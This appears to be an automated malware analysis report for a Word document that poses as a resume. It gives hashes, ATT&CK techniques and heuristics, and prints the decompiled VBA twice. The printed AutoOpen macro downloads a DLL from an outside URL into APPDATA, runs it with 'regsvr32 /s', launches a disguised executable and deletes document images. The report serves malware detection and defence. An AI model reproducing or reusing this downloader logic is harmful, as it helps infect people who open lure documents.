Office (OLE) malware analysis — malicious · 18698c5a6ff96d21

MALICIOUS

Office (OLE)

175.5 KB First seen: 2020-07-24

MD5: 9ba3275ac0e65b9cd4d5afa0adf401b4 SHA-1: 0360632cee9f04c2bd4cdea48f1f801e8a34e862 SHA-256: 18698c5a6ff96d21e7ca634a608f01a414ef6fbbd7c1b3bf0f2085c85374516e

218 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains VBA macros, including an AutoOpen macro, which is a common technique for initial execution. The macro references the CreateProcess and URLDownloadToFile APIs, indicating an intent to download and execute a secondary payload. The embedded URL https://marendoger.com/team/rumba.php is the most likely source for this payload. The document body appears to be a resume, likely used as a lure.

Heuristics 8

Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
LOLBin reference in VBA critical OLE_VBA_LOLBIN

LOLBin reference in VBA
Matched line in script
```
' Line #87:
'  LitStr 0x0010 "regsvr32.exe /s "
'  LitStr 0x0007 "APPDATA"
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
' Line #78:
'  FuncDefn (Sub AutoOpen())
' Line #79:
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
'  LitStr 0x0007 "APPDATA"
'  ArgsLd Environ 0x0001
'  LitStr 0x000F "\uCWOncHvBb.dll"
```
Reference to CreateProcess API high SC_STR_CREATEPROCESS

Reference to CreateProcess API
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://marendoger.com/team/rumba.php In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6235 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6235 bytes
SHA-256: `9224685c3a9cbe6f3e8277a02e4505f54b26eba9c4dd29c5cfb18d49ef844020`
Preview script First 1,000 lines of the extracted script Sub b() End Sub Sub b() End Sub ' Processing file: /tmp/qstore_67coyahz ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 962 bytes ' Macros/VBA/Module1 - 5114 bytes ' Line #0: ' Line #1: ' Option (Explicit) ' Line #2: ' Line #3: ' Dim (Private Const) ' LitHI4 0x0020 0x0000 ' VarDefn NORMAL_PRIORITY_CLASS ' Line #4: ' Dim (Private Const) ' LitDI4 0x0001 0x0000 ' UMi ' VarDefn EPMVEjewph ' Line #5: ' Dim (Private Const) ' LitHI4 0x0000 0x0800 ' VarDefn olQcGUTau ' Line #6: ' Line #7: ' Type (Private) STARTUPINFO ' Line #8: ' DimImplicit ' VarDefn cb (As Long) ' Line #9: ' DimImplicit ' VarDefn lpReserved (As String) ' Line #10: ' DimImplicit ' VarDefn lpDesktop (As String) ' Line #11: ' DimImplicit ' VarDefn lpTitle (As String) ' Line #12: ' DimImplicit ' VarDefn dwX (As Long) ' Line #13: ' DimImplicit ' VarDefn dwY (As Long) ' Line #14: ' DimImplicit ' VarDefn dwXSize (As Long) ' Line #15: ' DimImplicit ' VarDefn dwYSize (As Long) ' Line #16: ' DimImplicit ' VarDefn dwXCountChars (As Long) ' Line #17: ' DimImplicit ' VarDefn dwYCountChars (As Long) ' Line #18: ' DimImplicit ' VarDefn dwFillAttribute (As Long) ' Line #19: ' DimImplicit ' VarDefn dwFlags (As Long) ' Line #20: ' DimImplicit ' VarDefn wShowWindow (As Integer) ' Line #21: ' DimImplicit ' VarDefn cbReserved2 (As Integer) ' Line #22: ' DimImplicit ' VarDefn lpReserved2 (As Long) ' Line #23: ' DimImplicit ' VarDefn hStdInput (As Long) ' Line #24: ' DimImplicit ' VarDefn hStdOutput (As Long) ' Line #25: ' DimImplicit ' VarDefn hStdError (As Long) ' Line #26: ' EndType ' Line #27: ' Line #28: ' Type (Private) PROCESS_INFORMATION ' Line #29: ' DimImplicit ' VarDefn hProcess (As Long) ' Line #30: ' DimImplicit ' VarDefn hThread (As Long) ' Line #31: ' DimImplicit ' VarDefn dwProcessID (As Long) ' Line #32: ' DimImplicit ' VarDefn dwThreadID (As Long) ' Line #33: ' EndType ' Line #34: ' Line #35: ' Line #36: ' Line #37: ' Line #38: ' LineCont 0x0004 14 00 04 00 ' FuncDefn (Private Declare PtrSafe Function IgriBCVf Lib "urlmon" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long) ' Line #39: ' Line #40: ' Line #41: ' Line #42: ' FuncDefn (Private Declare PtrSafe Function WaitForSingleObject Lib "kernel32.dll" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long) ' Line #43: ' FuncDefn (Private Declare PtrSafe Function CloseHandle Lib "kernel32.dll" (ByVal hObject As Long) As Long) ' Line #44: ' LineCont 0x0014 10 00 00 00 18 00 00 00 21 00 00 00 2B 00 00 00 32 00 00 00 ' FuncDefn (Private Declare PtrSafe Function CreateProcessA Lib "kernel32.dll" (ByVal lpApplicationName As Long, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As , lpProcessInformation As ) As Long) ' Line #45: ' Line #46: ' Line #47: ' Line #48: ' Line #49: ' FuncDefn (Sub Mercedes()) ' Line #50: ' Line #51: ' Dim ' VarDefn ImageMy (As Shape) ' Line #52: ' Line #53: ' SetStmt ' LitStr 0x0009 "Picture 3" ' Ld ActiveDocument ' ArgsMemLd Shapes 0x0001 ' Set ImageMy ' Line #54: ' Line #55: ' Ld ImageMy ' ArgsMemCall Delete 0x0000 ' Line #56: ' Line #57: ' Dim ' VarDefn obj (As Shape) ' Line #58: ' Line #59: ' SetStmt ' LitStr 0x0009 "Picture 5" ' Ld ActiveDocument ' ArgsMemLd Shapes 0x0001 ' Set obj ' Line #60: ' Line #61: ' Ld obj ' ArgsMemCall Delete 0x0000 ' Line #62: ' EndSub ' Line #63: ' Line #64: ' Line #65: ' Line #66: ' FuncDefn (Sub TsszDqFNmimMsVoEWmL()) ' Line #67: ' Dim ' VarDefn kAKjmRBDUFbRadZx (As String) ' Line #68: ' Line #69: ' Line #70: ' LitStr 0x0025 "https://marendoger.com/team/rumba.php" ' St kAKjmRBDUFbRadZx ' Line #71: ' Line #72: ' LitDI2 0x0000 ' Ld kAKjmRBDUFbRadZx ' LitStr 0x0007 "APPDATA" ' ArgsLd Environ 0x0001 ' LitStr 0x000F "\uCWOncHvBb.dll" ' Concat ' Coerce (Str) ' LitDI2 0x0000 ' LitDI2 0x0000 ' ArgsCall IgriBCVf 0x0005 ' Line #73: ' ArgsCall Mercedes 0x0000 ' Line #74: ' EndSub ' Line #75: ' Line #76: ' Line #77: ' Line #78: ' FuncDefn (Sub AutoOpen()) ' Line #79: ' ArgsCall TsszDqFNmimMsVoEWmL 0x0000 ' Line #80: ' Line #81: ' Line #82: ' Dim ' VarDefn oINPTOjiu (As PROCESS_INFORMATION) ' Line #83: ' Dim ' VarDefn JGeonydTqpbGQ ' Line #84: ' Dim ' VarDefn dLHLKAbruZGLB (As Long) ' Line #85: ' Dim ' VarDefn SYxnJHzNMOcGc (As String) ' Line #86: ' Line #87: ' LitStr 0x0010 "regsvr32.exe /s " ' LitStr 0x0007 "APPDATA" ' ArgsLd Environ 0x0001 ' LitStr 0x000D "\uCWOncHvBb.d" ' Concat ' LitStr 0x0002 "ll" ' Concat ' Coerce (Str) ' Concat ' St SYxnJHzNMOcGc ' Line #88: ' LitDI4 0x0000 0x0000 ' Ld SYxnJHzNMOcGc ' LitDI4 0x0000 0x0000 ' LitDI4 0x0000 0x0000 ' LitDI4 0x0001 0x0000 ' Ld olQcGUTau ' LitDI4 0x0000 0x0000 ' LitDI4 0x0000 0x0000 ' Ld JGeonydTqpbGQ ' Ld oINPTOjiu ' ArgsLd CreateProcessA 0x000A ' St dLHLKAbruZGLB ' Line #89: ' Line #90: ' Line #91: ' Ld oINPTOjiu ' MemLd hProcess ' Ld EPMVEjewph ' ArgsCall WaitForSingleObject 0x0002 ' Line #92: ' Line #93: ' Ld dLHLKAbruZGLB ' ArgsCall CloseHandle 0x0001 ' Line #94: ' Line #95: ' Dim ' VarDefn owPxWNvZqRVmS (As Long) ' Line #96: ' Line #97: ' Dim ' VarDefn iOJnDRNFqci (As String) ' Line #98: ' Line #99: ' LitStr 0x0007 "APPDATA" ' ArgsLd Environ 0x0001 ' LitStr 0x0023 "\Windows Media Player\wpvnetwks.exe" ' Concat ' Coerce (Str) ' St iOJnDRNFqci ' Line #100: ' Line #101: ' LitDI4 0x0000 0x0000 ' Ld iOJnDRNFqci ' LitDI4 0x0000 0x0000 ' LitDI4 0x0000 0x0000 ' LitDI4 0x0001 0x0000 ' LitDI4 0x0000 0x0000 ' LitDI4 0x0000 0x0000 ' LitDI4 0x0000 0x0000 ' Ld JGeonydTqpbGQ ' Ld oINPTOjiu ' ArgsLd CreateProcessA 0x000A ' St owPxWNvZqRVmS ' Line #102: ' Line #103: ' Ld owPxWNvZqRVmS ' ArgsCall CloseHandle 0x0001 ' Line #104: ' Line #105: ' EndSub ' Line #106: ' Line #107: ' Line #108: ' Line #109:

SHA-256: 9224685c3a9cbe6f3e8277a02e4505f54b26eba9c4dd29c5cfb18d49ef844020

Preview script

First 1,000 lines of the extracted script

Sub b()

End Sub
Sub b()

End Sub
' Processing file: /tmp/qstore_67coyahz
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 962 bytes
' Macros/VBA/Module1 - 5114 bytes
' Line #0:
' Line #1:
' 	Option  (Explicit)
' Line #2:
' Line #3:
' 	Dim (Private Const) 
' 	LitHI4 0x0020 0x0000 
' 	VarDefn NORMAL_PRIORITY_CLASS
' Line #4:
' 	Dim (Private Const) 
' 	LitDI4 0x0001 0x0000 
' 	UMi 
' 	VarDefn EPMVEjewph
' Line #5:
' 	Dim (Private Const) 
' 	LitHI4 0x0000 0x0800 
' 	VarDefn olQcGUTau
' Line #6:
' Line #7:
' 	Type (Private) STARTUPINFO
' Line #8:
' 	DimImplicit 
' 	VarDefn cb (As Long)
' Line #9:
' 	DimImplicit 
' 	VarDefn lpReserved (As String)
' Line #10:
' 	DimImplicit 
' 	VarDefn lpDesktop (As String)
' Line #11:
' 	DimImplicit 
' 	VarDefn lpTitle (As String)
' Line #12:
' 	DimImplicit 
' 	VarDefn dwX (As Long)
' Line #13:
' 	DimImplicit 
' 	VarDefn dwY (As Long)
' Line #14:
' 	DimImplicit 
' 	VarDefn dwXSize (As Long)
' Line #15:
' 	DimImplicit 
' 	VarDefn dwYSize (As Long)
' Line #16:
' 	DimImplicit 
' 	VarDefn dwXCountChars (As Long)
' Line #17:
' 	DimImplicit 
' 	VarDefn dwYCountChars (As Long)
' Line #18:
' 	DimImplicit 
' 	VarDefn dwFillAttribute (As Long)
' Line #19:
' 	DimImplicit 
' 	VarDefn dwFlags (As Long)
' Line #20:
' 	DimImplicit 
' 	VarDefn wShowWindow (As Integer)
' Line #21:
' 	DimImplicit 
' 	VarDefn cbReserved2 (As Integer)
' Line #22:
' 	DimImplicit 
' 	VarDefn lpReserved2 (As Long)
' Line #23:
' 	DimImplicit 
' 	VarDefn hStdInput (As Long)
' Line #24:
' 	DimImplicit 
' 	VarDefn hStdOutput (As Long)
' Line #25:
' 	DimImplicit 
' 	VarDefn hStdError (As Long)
' Line #26:
' 	EndType 
' Line #27:
' Line #28:
' 	Type (Private) PROCESS_INFORMATION
' Line #29:
' 	DimImplicit 
' 	VarDefn hProcess (As Long)
' Line #30:
' 	DimImplicit 
' 	VarDefn hThread (As Long)
' Line #31:
' 	DimImplicit 
' 	VarDefn dwProcessID (As Long)
' Line #32:
' 	DimImplicit 
' 	VarDefn dwThreadID (As Long)
' Line #33:
' 	EndType 
' Line #34:
' Line #35:
' Line #36:
' Line #37:
' Line #38:
' 	LineCont 0x0004 14 00 04 00
' 	FuncDefn (Private Declare PtrSafe Function IgriBCVf Lib "urlmon" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long)
' Line #39:
' Line #40:
' Line #41:
' Line #42:
' 	FuncDefn (Private Declare PtrSafe Function WaitForSingleObject Lib "kernel32.dll" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long)
' Line #43:
' 	FuncDefn (Private Declare PtrSafe Function CloseHandle Lib "kernel32.dll" (ByVal hObject As Long) As Long)
' Line #44:
' 	LineCont 0x0014 10 00 00 00 18 00 00 00 21 00 00 00 2B 00 00 00 32 00 00 00
' 	FuncDefn (Private Declare PtrSafe Function CreateProcessA Lib "kernel32.dll" (ByVal lpApplicationName As Long, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As , lpProcessInformation As ) As Long)
' Line #45:
' Line #46:
' Line #47:
' Line #48:
' Line #49:
' 	FuncDefn (Sub Mercedes())
' Line #50:
' Line #51:
' 	Dim 
' 	VarDefn ImageMy (As Shape)
' Line #52:
' Line #53:
' 	SetStmt 
' 	LitStr 0x0009 "Picture 3"
' 	Ld ActiveDocument 
' 	ArgsMemLd Shapes 0x0001 
' 	Set ImageMy 
' Line #54:
' Line #55:
' 	Ld ImageMy 
' 	ArgsMemCall Delete 0x0000 
' Line #56:
' Line #57:
' 	Dim 
' 	VarDefn obj (As Shape)
' Line #58:
' Line #59:
' 	SetStmt 
' 	LitStr 0x0009 "Picture 5"
' 	Ld ActiveDocument 
' 	ArgsMemLd Shapes 0x0001 
' 	Set obj 
' Line #60:
' Line #61:
' 	Ld obj 
' 	ArgsMemCall Delete 0x0000 
' Line #62:
' 	EndSub 
' Line #63:
' Line #64:
' Line #65:
' Line #66:
' 	FuncDefn (Sub TsszDqFNmimMsVoEWmL())
' Line #67:
' 	Dim 
' 	VarDefn kAKjmRBDUFbRadZx (As String)
' Line #68:
' Line #69:
' Line #70:
' 	LitStr 0x0025 "https://marendoger.com/team/rumba.php"
' 	St kAKjmRBDUFbRadZx 
' Line #71:
' Line #72:
' 	LitDI2 0x0000 
' 	Ld kAKjmRBDUFbRadZx 
' 	LitStr 0x0007 "APPDATA"
' 	ArgsLd Environ 0x0001 
' 	LitStr 0x000F "\uCWOncHvBb.dll"
' 	Concat 
' 	Coerce (Str) 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsCall IgriBCVf 0x0005 
' Line #73:
' 	ArgsCall Mercedes 0x0000 
' Line #74:
' 	EndSub 
' Line #75:
' Line #76:
' Line #77:
' Line #78:
' 	FuncDefn (Sub AutoOpen())
' Line #79:
' 	ArgsCall TsszDqFNmimMsVoEWmL 0x0000 
' Line #80:
' Line #81:
' Line #82:
' 	Dim 
' 	VarDefn oINPTOjiu (As PROCESS_INFORMATION)
' Line #83:
' 	Dim 
' 	VarDefn JGeonydTqpbGQ
' Line #84:
' 	Dim 
' 	VarDefn dLHLKAbruZGLB (As Long)
' Line #85:
' 	Dim 
' 	VarDefn SYxnJHzNMOcGc (As String)
' Line #86:
' Line #87:
' 	LitStr 0x0010 "regsvr32.exe /s "
' 	LitStr 0x0007 "APPDATA"
' 	ArgsLd Environ 0x0001 
' 	LitStr 0x000D "\uCWOncHvBb.d"
' 	Concat 
' 	LitStr 0x0002 "ll"
' 	Concat 
' 	Coerce (Str) 
' 	Concat 
' 	St SYxnJHzNMOcGc 
' Line #88:
' 	LitDI4 0x0000 0x0000 
' 	Ld SYxnJHzNMOcGc 
' 	LitDI4 0x0000 0x0000 
' 	LitDI4 0x0000 0x0000 
' 	LitDI4 0x0001 0x0000 
' 	Ld olQcGUTau 
' 	LitDI4 0x0000 0x0000 
' 	LitDI4 0x0000 0x0000 
' 	Ld JGeonydTqpbGQ 
' 	Ld oINPTOjiu 
' 	ArgsLd CreateProcessA 0x000A 
' 	St dLHLKAbruZGLB 
' Line #89:
' Line #90:
' Line #91:
' 	Ld oINPTOjiu 
' 	MemLd hProcess 
' 	Ld EPMVEjewph 
' 	ArgsCall WaitForSingleObject 0x0002 
' Line #92:
' Line #93:
' 	Ld dLHLKAbruZGLB 
' 	ArgsCall CloseHandle 0x0001 
' Line #94:
' Line #95:
' 	Dim 
' 	VarDefn owPxWNvZqRVmS (As Long)
' Line #96:
' Line #97:
' 	Dim 
' 	VarDefn iOJnDRNFqci (As String)
' Line #98:
' Line #99:
' 	LitStr 0x0007 "APPDATA"
' 	ArgsLd Environ 0x0001 
' 	LitStr 0x0023 "\Windows Media Player\wpvnetwks.exe"
' 	Concat 
' 	Coerce (Str) 
' 	St iOJnDRNFqci 
' Line #100:
' Line #101:
' 	LitDI4 0x0000 0x0000 
' 	Ld iOJnDRNFqci 
' 	LitDI4 0x0000 0x0000 
' 	LitDI4 0x0000 0x0000 
' 	LitDI4 0x0001 0x0000 
' 	LitDI4 0x0000 0x0000 
' 	LitDI4 0x0000 0x0000 
' 	LitDI4 0x0000 0x0000 
' 	Ld JGeonydTqpbGQ 
' 	Ld oINPTOjiu 
' 	ArgsLd CreateProcessA 0x000A 
' 	St owPxWNvZqRVmS 
' Line #102:
' Line #103:
' 	Ld owPxWNvZqRVmS 
' 	ArgsCall CloseHandle 0x0001 
' Line #104:
' Line #105:
' 	EndSub 
' Line #106:
' Line #107:
' Line #108:
' Line #109:

Open this report in the interactive analyzer, or submit your own file for analysis.